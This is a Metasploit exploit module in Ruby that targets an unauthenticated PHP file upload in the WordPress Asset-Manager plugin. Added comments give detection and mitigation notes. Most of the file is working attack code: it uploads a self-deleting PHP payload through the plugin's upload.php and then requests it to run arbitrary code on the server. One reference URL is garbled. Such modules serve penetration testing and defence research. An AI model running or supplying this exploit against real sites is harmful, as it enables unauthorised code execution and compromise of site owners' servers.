##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

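# Metasploit module for the unauthenticated file upload in the WordPress
# Asset-Manager plugin (<= 2.0, per the module description).
#
# Weakness, as exercised by the code below: the plugin's upload.php accepts a
# multipart "Filedata" part without authentication and stores it under its
# original, caller-chosen file name in wp-content/uploads/assets/temp/, a
# directory served by the web server. A stored .php file is therefore run by
# the PHP handler when requested.
#
# Defender notes:
#   * Detection: an unauthenticated POST to
#     wp-content/plugins/asset-manager/upload.php followed by a GET for a
#     *.php file under wp-content/uploads/assets/temp/ in the access log.
#   * The payload is requested with :unlink_self => true, so the uploaded file
#     is presumably removed after it runs -- TODO confirm against the PhpEXE
#     mixin. An empty temp directory is not evidence that nothing was uploaded.
#   * Mitigation: remove or update the plugin, and deny script execution in
#     upload directories at the web-server level.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, payload constraints, targets)
  # and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL contains embedded spaces and looks rewritten
          # by the hosting page; the original reference is not recoverable here.
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a randomly named .php file through the plugin's upload.php and then
  # requests it from the temp directory.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not echo the file name; and when the follow-up GET returns a
  # non-200 status. A missing response to the GET is not treated as a failure.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Single multipart part named "Filedata"; the file name, including its
    # .php extension, is taken as supplied by the client.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drops a CRLF that sits directly before a "--_Part_" boundary marker at
    # the start of a line (presumably the leading one emitted by to_s).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The response body is expected to contain the stored file name.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    # Only an explicit non-200 reply counts as failure; nil (no reply) passes.
    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end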